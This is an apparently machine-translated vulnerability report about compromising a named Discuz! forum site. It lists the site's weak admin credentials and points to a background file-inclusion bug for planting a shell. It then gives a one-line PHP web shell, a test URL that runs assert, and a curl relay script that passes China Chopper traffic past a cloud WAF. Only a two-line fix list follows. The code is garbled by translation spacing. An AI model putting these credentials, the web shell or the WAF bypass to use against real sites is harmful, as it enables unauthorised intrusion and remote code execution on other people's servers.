Getshell can be used for weak passwords in a substation of Huaxia mingwang (strong and weak passwords and patches are required)
Huaxia mingwang's weak password for a substation can be getshell (case study of cloud lock waf)
Directly go to the question, this site is http://bbs.sudu.cn/
Weak Password: username admin password qwer
Go to the background and check it out. It's Discuz! X3.2 Release 20140603, from the perspective of the number of poor users at the front end, there is a high possibility of Unpatched versions. Please try getshell. Refer
WooYun: Discuz3.2 Background File Inclusion Vulnerability using shell in the background
The specific operation process will not be long-winded. There is a small detail here. You must add the specific IP address of the server to the local host. Otherwise, waf will intercept the server (as for how to obtain the specific IP address, the simplest is to test the mail sending function)
Through the "File Check" function in the background, we can clearly see that a single sentence file is successfully generated.
Visit the browser.
The waf is intercepted, and it is estimated that the kitchen knife cannot be connected.
Sure enough, it was also blocked. wooyun zone turned over the experience of its predecessors and finally broke through. Let's look at it.
1. modify a sentence
$_REQUEST['a']($_REQUEST['b']);?>
Re-write a sentence to the root directory by using the getshell method above, You have to access the address http://bbs.sudu.cn/help.php
Test the http://bbs.sudu.cn/help.php? A = assert & B = phpinfo ();
2. Create shell. php and enter the conversion script of the kitchen knife.
$ Target = "http://bbs.sudu.cn/help.php"; // the address of the previous sentence $ poststr = ''; $ I = 0; foreach ($ _ POST as $ k => $ v) {if (strstr ($ v, "base64_decode") {$ v = str_replace ("base64_decode (", "", $ v); $ v = str_replace (")) ",") ", $ v);} else {if ($ k =" z0 ") $ v = base64_decode ($ v);} $ pp = $ k. "= ". urlencode ($ v); // echo ($ pp); if ($ I! = 0) {$ poststr = $ poststr. "&". $ pp;} else {$ poststr = $ pp;} $ I = $ I + 1;} $ ch = curl_init (); $ curl_url = $ target. "? ". $ _ SERVER ['query _ string']; curl_setopt ($ ch, CURLOPT_URL, $ curl_url); curl_setopt ($ ch, CURLOPT_POST, 1); curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ poststr); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); $ result = curl_exec ($ ch); curl_close ($ ch); echo $ result;?>
3. Set up the php environment locally, place the intermediate script in the middle, and connect it to the kitchen knife,
Fill in http: // 127.0.0.1: 8004/shell. php? A = enter B in assert Password
Successful breakthroughs,
Solution:
1. strong and weak passwords
2. Install patches for open-source programs in a timely manner